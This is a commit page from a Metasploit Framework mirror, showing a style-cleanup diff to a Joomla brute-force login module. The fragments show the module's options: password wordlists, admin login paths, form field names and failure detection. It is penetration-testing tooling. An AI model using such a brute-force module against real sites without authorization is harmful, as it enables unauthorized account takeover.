infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

First style issues cleanup

bug/bundler_fix
jvazquez-r7 2014-07-21 09:49:05 -05:00
parent 7a5f3b8991
commit 986b8e5d02
1 changed files with 26 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
modules/auxiliary/scanner/http/joomla_bruteforce_login.rb
View File

@ -12,14 +12,13 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Joomla Bruteforce Login Utility',
'Description' => 'This module attempts to authenticate to Joomla 2.5. or 3.0 through bruteforce attacks',
'Author' => [ 'luisco100[at]gmail.com' ],
'Author' => 'luisco100[at]gmail.com',
'References' =>
[
['CVE', '1999-0502'] # Weak password Joomla
@ -35,15 +34,16 @@ class Metasploit3 < Msf::Auxiliary
File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),
OptString.new('AUTH_URI', [ true, "The URI to authenticate against (default:auto)", "/administrator/index.php" ]),
OptString.new('FORM_URI', [ false, "The FORM URI to authenticate against (default:auto)" , "/administrator"]),
OptString.new('AUTH_URI', [ true, "The URI to authenticate against", "/administrator/index.php" ]),
OptString.new('FORM_URI', [ false, "The FORM URI to authenticate against" , "/administrator"]),
OptString.new('USER_VARIABLE', [ false, "The name of the variable for the user field", "username"]),
OptString.new('PASS_VARIABLE', [ false, "The name of the variable for the password field" , "passwd"]),
OptString.new('WORD_ERROR', [ false, "The word of message for detect that login fail","mod-login-username"]),
OptString.new('REQUEST_TYPE', [ false, "Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)", "POST" ]),
OptString.new('UserAgent', [ true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0' ]),
], self.class)
register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
register_autofilter_ports([80, 443])
end
def find_auth_uri
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
res = send_request_cgi({
'uri' => path,
'method' => 'GET'
}, 10)
})
next unless res
if res.code == 301 || res.code == 302 && res.headers['Location'] && res.headers['Location'] !~ /^http/
@ -184,7 +184,7 @@ class Metasploit3 < Msf::Auxiliary
'Content-Type' => ctype,
'Referer' => referer_var,
'User-Agent' => datastore['UserAgent'],
},
}
})
vprint_status("#{target_url} -> First Response Code : #{response.code}")
@ -197,8 +197,8 @@ class Metasploit3 < Msf::Auxiliary
response = send_request_raw({
'uri' => path,
'method' => 'GET',
'cookie' => "#{value_cookie}",
}, 30)
'cookie' => "#{value_cookie}"
})
end
return response
@ -247,7 +247,7 @@ class Metasploit3 < Msf::Auxiliary
res = send_request_cgi({
'uri' => path,
'method' => 'GET'
}, 10)
})
end
#print_status("Response Get login cookie: #{res.to_s}")